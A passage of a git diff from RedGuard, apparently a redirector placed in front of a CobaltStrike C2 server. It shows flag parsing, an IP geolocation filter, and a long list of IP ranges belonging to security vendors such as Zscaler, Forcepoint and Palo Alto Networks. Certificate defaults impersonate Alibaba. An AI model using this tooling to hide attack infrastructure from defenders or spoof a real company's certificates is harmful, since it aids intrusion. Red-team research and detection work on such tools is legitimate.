flag.StringVar(&parse.ConfigPath, "config", ``, `Set Config Path`) - flag.StringVar(&parse.Location, "location", `风起`, `IPLookUP Location`) - flag.StringVar(&cert.Country, "country", `CN`, `Cert Country`) - flag.StringVar(&cert.CommonName, "common", `*.aliyun.com`, `Cert CommonName`) - flag.StringVar(&cert.Organization, "organization", `Alibaba (China) Technology Co., Ltd.`, `Cert Organization`) - flag.StringVar(&cert.HasCert, "HasCert", `true`, `Whether to use the certificate you have applied for`) - flag.StringVar(&cert.DNSNameTo, "dns", `*.aliyun.com,manager.channel.aliyun.com,*.acs-internal.aliyuncs.com",*.connect.aliyun.com,aliyun.com,whois.www.net.cn,tianchi-global.com`, `Cert DNSName`) - flag.StringVar(&cert.Locality, "locality", `HangZhou`, `Cert Locality`) - flag.StringVar(&proxy.HostTarget, "host", `{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}`, `Set Proxy HostTarget`) - flag.StringVar(&proxy.HTTPSPort, "https", `:443`, `Set Proxy HTTPS Port`) - flag.StringVar(&proxy.HTTPort, "http", `:80`, `Set Proxy HTTP Port`) - flag.StringVar(&proxy.DropAction, "DropAction", "redirect", `RedGuard interception action`) - flag.StringVar(&proxy.Redirect, "redirect", `https://360.net`, `Proxy redirect URL`) - flag.StringVar(&proxy.AllowLocation, "allowLocation", "*", "Proxy Requests Allow Location") - flag.StringVar(&proxy.AllowIP, "allowIP", "*", "Proxy Requests Allow IP") - flag.StringVar(&proxy.AllowTime, "allowTime", "*", "Proxy Requests Allow Time") - flag.StringVar(&proxy.MalleableFile, "malleable", "*", "Set Proxy Requests Filter Malleable File") - flag.Parse() -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: arguments.go + * @Time: 2022/5/5 9:46 + **/ + +package core + +import ( + "flag" + + "RedGuard/core/parameter" +) + +func CmdParse(parse *parameter.Parses, cert *parameter.Cert, proxy *parameter.Proxy) { + flag.BoolVar(&parse.Update, "u", false, `Enable configuration file modification`) + flag.StringVar(&parse.C2Type, "type", `CobaltStrike`, `C2 Server Type`) + flag.StringVar(&parse.IP, "ip", ``, `IPLookUP IP`) + flag.StringVar(&parse.ConfigPath, "config", ``, `Set Config Path`) + flag.StringVar(&parse.Location, "location", `风起`, `IPLookUP Location`) + flag.StringVar(&cert.Country, "country", `CN`, `Cert Country`) + flag.StringVar(&cert.CommonName, "common", `*.aliyun.com`, `Cert CommonName`) + flag.StringVar(&cert.Organization, "organization", `Alibaba (China) Technology Co., Ltd.`, `Cert Organization`) + flag.StringVar(&cert.HasCert, "HasCert", `true`, `Whether to use the certificate you have applied for`) + flag.StringVar(&cert.DNSNameTo, "dns", `*.aliyun.com,manager.channel.aliyun.com,*.acs-internal.aliyuncs.com",*.connect.aliyun.com,aliyun.com,whois.www.net.cn,tianchi-global.com`, `Cert DNSName`) + flag.StringVar(&cert.Locality, "locality", `HangZhou`, `Cert Locality`) + flag.StringVar(&proxy.HostTarget, "host", `{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}`, `Set Proxy HostTarget`) + flag.StringVar(&proxy.HTTPSPort, "https", `:443`, `Set Proxy HTTPS Port`) + flag.StringVar(&proxy.HTTPort, "http", `:80`, `Set Proxy HTTP Port`) + flag.StringVar(&proxy.DropAction, "DropAction", "redirect", `RedGuard interception action`) + flag.StringVar(&proxy.Redirect, "redirect", `https://360.net`, `Proxy redirect URL`) + flag.StringVar(&proxy.AllowLocation, "allowLocation", "*", "Proxy Requests Allow Location") + flag.StringVar(&proxy.AllowIP, "allowIP", "*", "Proxy Requests Allow IP") + flag.StringVar(&proxy.AllowTime, "allowTime", "*", "Proxy Requests Allow Time") + flag.StringVar(&proxy.MalleableFile, "malleable", "*", "Set Proxy Requests Filter Malleable File") + flag.Parse() +} diff --git a/core/ipLookUpHelper.go b/core/ipLookUpHelper.go index 624a532..3fb891b 100644 --- a/core/ipLookUpHelper.go +++ b/core/ipLookUpHelper.go @@ -1,92 +1,92 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: ipLookUp.go - * @Time: 2022/5/5 9:13 - **/ - -package core - -import ( - "bytes" - "encoding/json" - "fmt" - "regexp" - "strings" - - "RedGuard/lib" - - "github.com/tidwall/gjson" -) - -// IPLookup IP origin,API is defined to extract relevant information -type ipLookup struct { - allowStatus int // API http request status code - hasCount int // Check if the first character of location is in English - body string // Get THE API response body JSON data - Tag string // The json data Tag - location string // Restrict the geographical location of the online -} - -var ( - _apiUrl = []string{ - // Chinese Users IP API - "https://sp0.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=%s&co=&resource_id=6006", - // IP API for users in other countries - "https://ipapi.co/%s/json/", - } - logger = lib.Logger() // logger output model -) - -// IPLookUp returns true if Check whether the IP address is the same as the owning place -// @param ip string Specify IP address -// @param location string Specify location -// NOTE: other countries Server You are advised to set location to English -// This will prioritize IP API that are more efficient for you -func IPLookUp(location, ip string) (state bool) { - var IPLook ipLookup - for _, url := range _apiUrl { - // Check preferentially invoked - if IPLook.hasCount != 1 { - // Check that the first character of location is in English - if regexp.MustCompile("[a-zA-Z]").MatchString(location[0:1]) { - // Other countries IP API are preferentially invoked if conditions are met - url, IPLook.hasCount = _apiUrl[1], 1 - } - } else { - url = _apiUrl[0] // preferentially invoked Chinese Users IP API - } - - // Get json data for the IP API response body - IPLook.allowStatus, IPLook.body = lib.HTTPRequest(fmt.Sprintf(url, ip)) - if IPLook.allowStatus == 200 { - // Select the response JSON tag when json data is available - if url == _apiUrl[0] { - IPLook.Tag = `data.#.location` // Chinese Users IP API Tag - break - } - IPLook.Tag = `city` - IPLook.location += gjson.Get(IPLook.body, `region`).String() - break - } - } - // Check for valid JSON data - if gjson.Valid(IPLook.body) { - // Extracting JSON data - result := gjson.Get(IPLook.body, IPLook.Tag) - if result.Exists() { - for _, name := range result.Array() { - IPLook.location += name.String() - } - var prettyJSON bytes.Buffer - // Format output JSON data - _ = json.Indent(&prettyJSON, []byte(IPLook.body), "", "\t") - logger.Emergency(string(prettyJSON.Bytes())) - // Check whether the IP address is the same as the specified location - if strings.Contains(strings.ToLower(IPLook.location), strings.ToLower(location)) { - return true // The query result is true - } - } - } - return false -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: ipLookUp.go + * @Time: 2022/5/5 9:13 + **/ + +package core + +import ( + "bytes" + "encoding/json" + "fmt" + "regexp" + "strings" + + "RedGuard/lib" + + "github.com/tidwall/gjson" +) + +// IPLookup IP origin,API is defined to extract relevant information +type ipLookup struct { + allowStatus int // API http request status code + hasCount int // Check if the first character of location is in English + body string // Get THE API response body JSON data + Tag string // The json data Tag + location string // Restrict the geographical location of the online +} + +var ( + _apiUrl = []string{ + // Chinese Users IP API + "https://sp0.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=%s&co=&resource_id=6006", + // IP API for users in other countries + "https://ipapi.co/%s/json/", + } + logger = lib.Logger() // logger output model +) + +// IPLookUp returns true if Check whether the IP address is the same as the owning place +// @param ip string Specify IP address +// @param location string Specify location +// NOTE: other countries Server You are advised to set location to English +// This will prioritize IP API that are more efficient for you +func IPLookUp(location, ip string) (state bool) { + var IPLook ipLookup + for _, url := range _apiUrl { + // Check preferentially invoked + if IPLook.hasCount != 1 { + // Check that the first character of location is in English + if regexp.MustCompile("[a-zA-Z]").MatchString(location[0:1]) { + // Other countries IP API are preferentially invoked if conditions are met + url, IPLook.hasCount = _apiUrl[1], 1 + } + } else { + url = _apiUrl[0] // preferentially invoked Chinese Users IP API + } + + // Get json data for the IP API response body + IPLook.allowStatus, IPLook.body = lib.HTTPRequest(fmt.Sprintf(url, ip)) + if IPLook.allowStatus == 200 { + // Select the response JSON tag when json data is available + if url == _apiUrl[0] { + IPLook.Tag = `data.#.location` // Chinese Users IP API Tag + break + } + IPLook.Tag = `city` + IPLook.location += gjson.Get(IPLook.body, `region`).String() + break + } + } + // Check for valid JSON data + if gjson.Valid(IPLook.body) { + // Extracting JSON data + result := gjson.Get(IPLook.body, IPLook.Tag) + if result.Exists() { + for _, name := range result.Array() { + IPLook.location += name.String() + } + var prettyJSON bytes.Buffer + // Format output JSON data + _ = json.Indent(&prettyJSON, []byte(IPLook.body), "", "\t") + logger.Emergency(string(prettyJSON.Bytes())) + // Check whether the IP address is the same as the specified location + if strings.Contains(strings.ToLower(IPLook.location), strings.ToLower(location)) { + return true // The query result is true + } + } + } + return false +} diff --git a/core/parameter/options.go b/core/parameter/options.go index e5cdcae..1ea0474 100644 --- a/core/parameter/options.go +++ b/core/parameter/options.go @@ -1,45 +1,45 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: options.go - * @Time: 2022/5/5 9:44 - **/ - -package parameter - -type Parses struct { - Update bool - IP string - C2Type string - Location string - ConfigPath string -} - -type Cert struct { - Country string - CommonName string - Locality string - Organization string - DNSNameTo string - HasCert string - DNSName []string -} - -type Proxy struct { - HostTarget string - HTTPSPort string - HTTPort string - DropAction string - Redirect string - AllowLocation string - AllowIP string - AllowTime string - MalleableFile string -} - -// ProxyConf Reverse proxy configuration structure -type ProxyConf struct { - Port string - Action string - Pattern string -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: options.go + * @Time: 2022/5/5 9:44 + **/ + +package parameter + +type Parses struct { + Update bool + IP string + C2Type string + Location string + ConfigPath string +} + +type Cert struct { + Country string + CommonName string + Locality string + Organization string + DNSNameTo string + HasCert string + DNSName []string +} + +type Proxy struct { + HostTarget string + HTTPSPort string + HTTPort string + DropAction string + Redirect string + AllowLocation string + AllowIP string + AllowTime string + MalleableFile string +} + +// ProxyConf Reverse proxy configuration structure +type ProxyConf struct { + Port string + Action string + Pattern string +} diff --git a/data/banned_ips.go b/data/banned_ips.go index a777966..cc36346 100644 --- a/data/banned_ips.go +++ b/data/banned_ips.go @@ -1,20445 +1,20445 @@ -package data - -var BANIP = ` -100.20.0.0/16 -100.24.0.0/16 -103.10.197.50 -103.13.69.0/24 -103.16.16.107 -103.19.168.0/24 # Dell SonicWALL -103.234.220.197 -103.236.201.110 -103.236.201.57 -103.245.47.20 -103.246.0.0/16 -103.250.31.0/24 # Sophos Technologies Pvt. Ltd -103.27.124.82 -103.29.28.0/24 # Sophos Technologies Pvt. LtdIndia -103.29.70.23 -103.35.74.75 -103.35.74.77 -103.3.61.114 -103.4.0.0/16 -103.56.207.84 -103.8.0.0/16 -103.8.79.229 -103.96.20.0/22 -104.129.192.0/23 # Zscaler -104.129.192.0/23 # ZSCALER -104.129.192.0/24 # Zscaler -104.129.194.0/23 # Zscaler -104.129.194.0/23 # ZSCALER -104.129.194.0/24 # Zscaler -104.129.195.0/24 # Zscaler -104.129.196.0/23 # Zscaler -104.129.196.0/23 # ZSCALER -104.129.198.0/23 # Zscaler -104.129.198.0/23 # ZSCALER -104.129.200.0/23 # Zscaler -104.129.200.0/23 # ZSCALER -104.129.200.0/24 # Zscaler -104.129.201.0/24 # Zscaler -104.129.202.0/23 # Zscaler -104.129.202.0/23 # ZSCALER -104.129.204.0/23 # Zscaler -104.129.204.0/23 # ZSCALER -104.129.204.0/24 -104.129.204.0/24 # Zscaler -104.129.205.0/24 # Zscaler -104.129.206.0/23 # Zscaler -104.129.206.0/23 # ZSCALER -104.131.157.171 -104.132.0.72 -104.192.0.58 -104.200.20.46 -104.208.0.0/16 -104.208.158.116 -104.209.0.0/16 -104.210.0.0/16 -104.211.0.0/16 -104.214.0.0/16 -104.215.0.0/16 -104.218.63.73 -104.218.63.74 -104.218.63.75 -104.218.63.76 -104.219.104.0/24 # F5 Networks, Inc. -104.219.105.0/24 # F5 Networks, Inc. -104.219.106.0/24 # F5 Networks, Inc. -104.219.107.0/24 # F5 Networks, Inc. -104.219.108.0/24 # F5 Networks, Inc. -104.219.110.0/24 # F5 Networks, Inc. -104.219.111.0/24 # F5 Networks, Inc. -104.223.123.98 -104.236.141.156 -104.244.72.200 -104.244.74.78 -104.40.0.0/13 -104.40.0.0/16 -104.41.0.0/16 -104.42.0.0/16 -104.43.0.0/16 -104.44.0.0/16 -104.45.0.0/16 -104.46.0.0/16 -104.47.0.0/16 -106.187.37.101 -107.181.174.84 -107.20.0.0/16 -107.23.0.0/16 -109.126.9.228 -109.169.33.163 -109.190.182.44 -109.201.133.100 -109.69.67.17 -111.221.0.0/16 -111.248.62.31 -115.164.86.121 -115.70.208.19 -116.50.57.0/24 # Forcepoint Cloud Hong Kong -116.50.57.0/24 # Forcepoint Cloud Hong KongHong Kong -116.50.58.0/24 # Forcepoint Cloud AustraliaHong Kong -116.50.59.0/24 # Forcepoint Cloud IndiaHong Kong -116.50.60.0/24 # Forcepoint Cloud SingaporeHong Kong -116.50.61.0/24 # Forcepoint Cloud JapanHong Kong -116.50.62.0/24 # Forcepoint Cloud New ZealandHong Kong -118.163.74.160 -120.29.217.46 -122.248.0.0/16 -12.34.97.0/24 # -124.109.1.207 -124.47.150.0/24 -124.47.189.0/24 -125.212.241.182 -126.72.58.19 -128.177.125.0/24 # Zscaler -128.177.125.0/24 # ZSCALER -128.177.129.0/24 # Zscaler -128.177.129.0/24 # ZSCALER -128.177.136.0/24 # Zscaler -128.177.136.0/24 # ZSCALER -128.199.47.160 -128.199.76.145 -128.52.128.105 -130.204.161.3 -131.253.0.0/16 -133.218.180.149 -134.170.0.0/16 -137.116.0.0/16 -137.117.0.0/16 -137.135.0.0/16 -137.74.167.96 -137.74.169.241 -137.74.73.179 -137.83.128.0/24 # Zscaler -137.83.129.0/24 # -137.83.130.0/24 # -137.83.131.0/24 # Zscaler -137.83.132.0/24 # Zscaler -137.83.133.0/24 # Zscaler -137.83.134.0/24 # Zscaler -137.83.135.0/24 # Zscaler -137.83.137.0/24 # Zscaler -137.83.139.0/24 # Zscaler -137.83.140.0/24 # -137.83.141.0/24 # -137.83.142.0/24 # -137.83.145.0/24 # Zscaler -137.83.145.0/24 # Zscaler Softech India Private Limited -137.83.146.0/24 # Zscaler -137.83.148.0/24 # -137.83.149.0/24 # -137.83.150.0/24 # Zscaler -137.83.151.0/24 # Zscaler -137.83.152.0/24 # Zscaler -137.83.153.0/24 # Zscaler -137.83.154.0/24 # -137.83.155.0/24 # -137.83.157.0/24 # -137.83.158.0/24 # -137.83.159.0/24 # -137.83.194.0/24 # Palo Alto Networks -137.83.196.0/24 # Palo Alto Networks -137.83.197.0/24 # Palo Alto Networks -137.83.200.0/24 # Palo Alto Networks -137.83.201.0/24 # Palo Alto Networks -137.83.202.0/24 # Palo Alto Networks -137.83.203.0/24 # Palo Alto Networks -137.83.206.0/23 # Palo Alto Networks -137.83.208.0/24 # Palo Alto Networks -137.83.209.0/24 # Palo Alto Networks -137.83.211.0/24 # Palo Alto Networks -137.83.212.0/24 # Palo Alto Networks -137.83.213.0/24 # Palo Alto Networks -137.83.216.0/21 # Palo Alto Networks -137.83.224.0/20 # Palo Alto Networks -137.83.240.0/21 # Palo Alto Networks -137.83.248.0/23 # Palo Alto Networks -137.83.250.0/24 # Palo Alto Networks -137.83.251.0/24 # Palo Alto Networks -13.79.231.167 -138.197.167.60 -138.197.207.243 -138.197.85.80 -138.91.0.0/16 -139.162.105.26 -139.162.10.72 -139.162.124.207 -139.162.16.13 -139.162.226.245 -139.162.28.23 -139.162.28.31 -139.180.242.0/23 # Palo Alto Networks -139.180.244.0/23 # Palo Alto Networks -139.180.246.0/23 # Palo Alto Networks -139.59.213.165 -139.59.62.94 -141.170.2.53 -141.193.177.0/24 # Barracuda Security Group -141.255.189.161 -14.202.230.49 -142.4.211.161 -142.44.166.241 -143.127.100.0/24 -143.127.10.0/23 -143.127.102.0/24 -143.127.103.0/24 -143.127.119.0/24 -143.127.136.0/24 -143.127.138.0/24 -143.127.139.0/24 -143.127.14.0/23 -143.127.2.0/24 -143.127.241.0/24 -143.127.242.0/23 -143.127.87.0/24 -143.127.89.0/24 -143.127.93.0/24 -143.204.0.0/16 -144.217.161.119 -144.217.167.240 -144.217.174.248 -144.217.240.34 -144.217.94.195 -144.217.94.96 -145.220.75.103 -145.239.29.201 -145.239.74.47 -145.239.82.79 -145.239.91.37 -146.101.76.0/23 -146.101.78.0/24 -146.185.177.103 -147.135.156.122 -147.161.128.0/17 # Zscaler -147.161.128.0/17 # Zscaler Switzerland GmbHSwitzerland -147.161.164.0/23 # Zscaler -147.161.164.0/23 # Zscaler Switzerland GmbHSwitzerland -147.161.166.0/23 # Switzerland -148.163.148.0/22 -148.163.156.0/23 -148.64.0.0/19 # Symantec Corporation -148.64.24.0/24 # Symantec Corporation -149.202.185.34 -149.56.201.79 -149.56.223.241 -149.7.193.0/24 # PSINet, Inc. -150.70.0.0/22 -150.70.0.0/22 # Japan Network Information CenterJapan -150.70.104.0/22 -150.70.110.0/24 -150.70.112.0/20 -150.70.12.0/22 -150.70.12.0/22 # Japan Network Information CenterJapan -150.70.160.0/20 -150.70.160.0/20 # Japan Network Information CenterJapan -150.70.176.0/20 -150.70.176.0/20 # Japan Network Information CenterJapan -150.70.192.0/21 -150.70.192.0/21 # Japan Network Information CenterJapan -150.70.224.0/20 -150.70.224.0/20 # Japan Network Information Center -150.70.240.0/20 -150.70.31.0/24 -150.70.31.0/24 # Japan Network Information CenterJapan -150.70.4.0/22 -150.70.4.0/22 # Japan Network Information CenterJapan -150.70.48.0/20 # Japan Network Information CenterJapan -150.70.64.0/18 -150.70.64.0/20 -150.70.80.0/20 -150.70.80.0/20 # Japan Network Information CenterJapan -150.70.8.0/22 -150.70.8.0/22 # Japan Network Information CenterJapan -150.70.96.0/20 -151.80.238.152 -154.127.60.92 -154.16.149.35 -154.16.149.74 -154.59.123.0/24 -154.59.126.0/24 -155.133.64.203 -155.4.230.97 -155.4.250.85 -155.64.105.0/24 -155.64.138.0/24 -155.64.16.0/23 -155.64.23.0/24 -155.64.23.0/24 # Symantec Corporation -155.64.38.0/24 -155.64.40.0/24 -155.64.49.0/24 -155.64.56.0/24 -155.64.56.0/24 # Symantec Corporation -155.64.63.0/24 -155.64.63.0/24 # Symantec Corporation -156.67.106.251 -156.67.106.30 -156.67.106.32 -157.167.100.0/24 # Forcepoint Cloud Accra ACCA -157.167.10.0/24 # Forcepoint Cloud Belmopan BCVA -157.167.101.0/24 # Forcepoint Cloud Yamoussoukro ASKA -157.167.102.0/24 # Forcepoint Cloud Nairobi WILA -157.167.1.0/24 # Forcepoint Cloud Ltd -157.167.103.0/24 # Forcepoint Cloud Monrovia LIRA -157.167.104.0/24 # Forcepoint Cloud Valletta MLAA -157.167.105.0/24 # -157.167.106.0/24 # Forcepoint Cloud Monte Carlo MCMA -157.167.107.0/24 # -157.167.108.0/24 # Forcepoint Cloud Abuja ABVA -157.167.109.0/24 # Forcepoint Cloud San Marino RMIA -157.167.110.0/24 # Forcepoint Cloud Tunis TUNA -157.167.11.0/24 # Forcepoint Cloud San Jose SJOA -157.167.111.0/24 # -157.167.112.0/24 # Forcepoint Cloud The Valley AXAA -157.167.113.0/24 # -157.167.114.0/24 # Forcepoint Cloud Nassau NASA -157.167.115.0/24 # Forcepoint Cloud Bridgetown BGIA -157.167.116.0/24 # Forcepoint Cloud Hamilton BDAA -157.167.117.0/24 # Forcepoint Cloud Road Town EISA -157.167.118.0/24 # Forcepoint Cloud George Town GCMA -157.167.119.0/24 # -157.167.120.0/24 # Forcepoint Cloud Santo Domingo SDQA -157.167.12.0/24 # Forcepoint Cloud Quito UIOA -157.167.121.0/24 # -157.167.122.0/24 # -157.167.123.0/24 # -157.167.124.0/24 # Forcepoint Cloud Basseterre SKBA -157.167.125.0/24 # -157.167.126.0/24 # -157.167.127.0/24 # Forcepoint Cloud Nuuk GOHA -157.167.128.0/24 # -157.167.13.0/24 # Forcepoint Cloud San Salvador SALA -157.167.131.0/24 # -157.167.14.0/24 # Forcepoint Cloud Guatemala City GUAA -157.167.15.0/24 # Forcepoint Cloud Tegucigalpa TGUA -157.167.16.0/24 # -157.167.17.0/24 # Forcepoint Cloud La Paz LPBA -157.167.18.0/24 # Forcepoint Cloud Santiago SCLA -157.167.19.0/24 # Forcepoint Cloud Cayenne CAYA -157.167.200.0/24 # Forcepoint Cloud Ltd -157.167.20.0/24 # -157.167.2.0/24 # -157.167.21.0/24 # -157.167.22.0/24 # Forcepoint Cloud Lima LIMA -157.167.23.0/24 # -157.167.24.0/24 # Forcepoint Cloud Montevideo MVDA -157.167.25.0/24 # Forcepoint Cloud Caracas CCSA -157.167.26.0/24 # Forcepoint Cloud Seoul ICNA -157.167.27.0/24 # Forcepoint Cloud Bandar Seri Begawan BWNA -157.167.28.0/24 # Forcepoint Cloud Phnom Penh PNHA -157.167.29.0/24 # Forcepoint Cloud Bangkok BKKA -157.167.30.0/24 # Forcepoint Cloud Dili DILA -157.167.3.0/24 # -157.167.31.0/24 # Forcepoint Cloud Hanoi HANA -157.167.32.0/24 # Forcepoint Cloud Vientiane VTEA -157.167.33.0/24 # Forcepoint Cloud Kuala Lumpur KLIA -157.167.34.0/24 # Forcepoint Cloud Jakarta CGKA -157.167.35.0/24 # Forcepoint Cloud Naypyidaw NYTA -157.167.36.0/24 # Forcepoint Cloud Macau MFMA -157.167.37.0/24 # Forcepoint Cloud Ulaanbaatar ULNA -157.167.38.0/24 # Forcepoint Cloud Taipei TPEA -157.167.39.0/24 # Forcepoint Cloud Manila MNLA -157.167.40.0/24 # Forcepoint Cloud Port Moresby POMA -157.167.41.0/24 # Forcepoint Cloud Suva SUVA -157.167.42.0/24 # Forcepoint Cloud Papeete PPTA -157.167.43.0/24 # Forcepoint Cloud Reykjavik KEFA -157.167.44.0/24 # Forcepoint Cloud Vilnius VNOA -157.167.45.0/24 # Forcepoint Cloud Copenhagen CPHA -157.167.46.0/24 # Forcepoint Cloud Warsaw WAWB -157.167.47.0/24 # Forcepoint Cloud Stockholm ARNA -157.167.48.0/24 # -157.167.49.0/24 # Forcepoint Cloud Tallin TLLA -157.167.50.0/24 # -157.167.51.0/24 # Forcepoint Cloud Moscow MOWA -157.167.52.0/24 # Forcepoint Cloud Kiev IEVA -157.167.53.0/24 # Forcepoint Cloud Gibraltar GIBA -157.167.54.0/24 # Forcepoint Cloud Dublin DUBA -157.167.55.0/24 # Forcepoint Cloud Ltd -157.167.56.0/24 # Forcepoint Cloud Lisbon LISA -157.167.57.0/24 # Forcepoint Cloud Ottawa YYZB -157.167.58.0/24 # Forcepoint Cloud Tirana TIAA -157.167.59.0/24 # Forcepoint Cloud Vienna VIEA -157.167.60.0/24 # Forcepoint Cloud Sarajevo SJJA -157.167.61.0/24 # Forcepoint Cloud Sofia SOFA -157.167.62.0/24 # Forcepoint Cloud Zagreb ZAGA -157.167.63.0/24 # -157.167.64.0/24 # Forcepoint Cloud Prague PRGA -157.167.65.0/24 # Forcepoint Cloud Athens ATHA -157.167.66.0/24 # -157.167.67.0/24 # Forcepoint Cloud Rome ITAA -157.167.68.0/24 # Forcepoint Cloud Skopje SKPA -157.167.69.0/24 # Forcepoint Cloud Chisinau KIVA -157.167.70.0/24 # Forcepoint Cloud Podgorica TGDA -157.167.71.0/24 # -157.167.72.0/24 # Forcepoint Cloud Belgrade BEGA -157.167.73.0/24 # -157.167.74.0/24 # -157.167.75.0/24 # Forcepoint Cloud Yerevan EVNA -157.167.76.0/24 # Forcepoint Cloud Baku GYDA -157.167.77.0/24 # Forcepoint Cloud Sana'a SAHA -157.167.78.0/24 # Forcepoint Cloud Manama BAHA -157.167.79.0/24 # Forcepoint Cloud Dhaka BZLA -157.167.80.0/24 # Forcepoint Cloud Thimphu PBHA -157.167.81.0/24 # -157.167.82.0/24 # Forcepoint Cloud Tbilisi TBSA -157.167.83.0/24 # Forcepoint Cloud Baghdad BGWA -157.167.84.0/24 # Forcepoint Cloud Amman AMMA -157.167.85.0/24 # Forcepoint Cloud Nur-Sultan ALAA -157.167.86.0/24 # Forcepoint Cloud Kuwait City KWIA -157.167.87.0/24 # Forcepoint Cloud Beirut LEBA -157.167.88.0/24 # Forcepoint Cloud Male MLEA -157.167.89.0/24 # Forcepoint Cloud Kathmandu KTMA -157.167.90.0/24 # Forcepoint Cloud Muscat MCTA -157.167.91.0/24 # Forcepoint Cloud Islamabad ISBA -157.167.92.0/24 # Forcepoint Cloud Doha DOHA -157.167.93.0/24 # Forcepoint Cloud Riyadh RUHA -157.167.94.0/24 # Forcepoint Cloud Sri Jayawardenepura Kotte CMBA -157.167.95.0/24 # Forcepoint Cloud Luxembourg City LUXA -157.167.96.0/24 # Forcepoint Cloud Bern BRNA -157.167.97.0/24 # Forcepoint Cloud Algiers ALGA -157.167.98.0/24 # Forcepoint Cloud Luanda LADA -157.167.99.0/24 # Forcepoint Cloud Addis Ababa ADDA -157.175.0.0/16 -157.55.0.0/16 -157.56.0.0/16 -158.255.6.242 -158.255.7.61 -158.69.215.7 -158.69.83.25 -160.1.0.0/16 -161.184.238.220 -162.219.176.26 -162.220.246.230 -162.221.201.57 -162.243.166.137 -162.243.75.204 -162.247.72.199 -162.247.72.200 -162.247.72.201 -162.247.72.202 -162.247.72.213 -162.247.72.216 -162.247.72.217 -162.247.72.27 -162.247.72.7 -162.247.73.204 -162.247.73.206 -163.172.101.137 -163.172.136.101 -163.172.137.174 -163.172.137.222 -163.172.138.11 -163.172.139.161 -163.172.140.123 -163.172.151.250 -163.172.151.47 -163.172.160.182 -163.172.162.106 -163.172.163.85 -163.172.171.163 -163.172.179.129 -163.172.212.115 -163.172.217.50 -163.172.223.200 -163.172.223.87 -164.132.106.162 -164.132.41.140 -164.132.51.91 -164.77.133.220 -165.225.0.0/17 # Zscaler -165.225.0.0/17 # ZSCALER -165.225.0.0/23 # Zscaler -165.225.0.0/23 # ZSCALER -165.225.10.0/23 # Zscaler -165.225.10.0/23 # ZSCALER -165.225.102.0/24 # Zscaler -165.225.104.0/23 # Zscaler -165.225.104.0/23 # ZSCALER -165.225.104.0/24 # Zscaler -165.225.104.0/24 # Zscaler Softech India Private Limited -165.225.105.0/24 # Zscaler -165.225.105.0/24 # Zscaler Softech India Private Limited -165.225.106.0/23 # Zscaler -165.225.106.0/23 # ZSCALER -165.225.106.0/24 # Zscaler -165.225.106.0/24 # Zscaler Softech India Private Limited -165.225.107.0/24 # Zscaler -165.225.107.0/24 # Zscaler Softech India Private Limited -165.225.110.0/23 # Zscaler -165.225.110.0/23 # ZSCALER -165.225.112.0/24 # Zscaler -165.225.113.0/24 # Zscaler -165.225.114.0/24 # Zscaler -165.225.115.0/24 # Zscaler -165.225.116.0/24 # Zscaler -165.225.117.0/24 # Zscaler -165.225.118.0/24 # Zscaler -165.225.12.0/23 # Zscaler -165.225.12.0/23 # ZSCALER -165.225.124.0/23 # Zscaler -165.225.124.0/23 # ZSCALER -165.225.16.0/23 # Zscaler -165.225.16.0/23 # ZSCALER -165.225.192.0/18 # Zscaler -165.225.192.0/18 # ZSCALER -165.225.192.0/23 # Zscaler -165.225.192.0/23 # ZSCALER -165.225.194.0/23 # Zscaler -165.225.194.0/23 # ZSCALER -165.225.196.0/23 # Zscaler -165.225.196.0/23 # ZSCALER -165.225.200.0/23 # -165.225.20.0/23 # -165.225.202.0/23 # -165.225.2.0/24 # Zscaler -165.225.204.0/23 # Zscaler -165.225.206.0/23 # Zscaler -165.225.206.0/23 # ZSCALER -165.225.208.0/23 # Zscaler -165.225.208.0/23 # ZSCALER -165.225.210.0/23 # Zscaler -165.225.210.0/23 # ZSCALER -165.225.214.0/23 # Zscaler -165.225.214.0/23 # ZSCALER -165.225.216.0/23 # -165.225.218.0/23 # -165.225.220.0/23 # -165.225.222.0/23 # Zscaler -165.225.222.0/23 # ZSCALER -165.225.226.0/23 # Zscaler -165.225.226.0/23 # ZSCALER -165.225.230.0/23 # Zscaler -165.225.230.0/23 # ZSCALER -165.225.230.0/24 # Zscaler -165.225.231.0/24 # -165.225.232.0/23 # -165.225.232.0/24 # Zscaler -165.225.233.0/24 # Zscaler -165.225.240.0/23 # Zscaler -165.225.240.0/23 # ZSCALER -165.225.24.0/23 # Zscaler -165.225.24.0/23 # ZSCALER -165.225.242.0/23 -165.225.26.0/23 # Zscaler -165.225.26.0/23 # ZSCALER -165.225.28.0/23 # Zscaler -165.225.28.0/23 # ZSCALER -165.225.30.0/24 # Zscaler -165.225.3.0/24 # Zscaler -165.225.31.0/24 # Zscaler -165.225.32.0/23 # Zscaler -165.225.32.0/23 # ZSCALER -165.225.32.0/24 # Zscaler -165.225.33.0/24 # Zscaler -165.225.34.0/23 # Zscaler -165.225.34.0/23 # ZSCALER -165.225.36.0/23 # Zscaler -165.225.36.0/23 # ZSCALER -165.225.36.0/24 # Zscaler -165.225.37.0/24 # Zscaler -165.225.38.0/23 # Zscaler -165.225.38.0/23 # ZSCALER -165.225.41.0/24 # Zscaler -165.225.42.0/24 # Zscaler -165.225.44.0/24 # Zscaler -165.225.45.0/24 # Zscaler -165.225.46.0/24 # Zscaler -165.225.48.0/24 # Zscaler -165.225.49.0/24 # Zscaler -165.225.50.0/23 # Zscaler -165.225.50.0/23 # ZSCALER -165.225.52.0/24 # Zscaler -165.225.54.0/24 # -165.225.55.0/24 # -165.225.56.0/22 # Zscaler -165.225.56.0/22 # ZSCALER -165.225.60.0/22 # Zscaler -165.225.60.0/22 # ZSCALER -165.225.66.0/24 # Zscaler -165.225.70.0/23 # Zscaler -165.225.70.0/23 # ZSCALER -165.225.70.0/24 # Zscaler -165.225.71.0/24 # Zscaler -165.225.72.0/22 # Zscaler -165.225.72.0/22 # ZSCALER -165.225.72.0/23 # Zscaler -165.225.72.0/23 # ZSCALER -165.225.74.0/24 # Zscaler -165.225.75.0/24 # Zscaler -165.225.76.0/22 # Zscaler -165.225.76.0/23 # Zscaler -165.225.76.0/24 # Zscaler 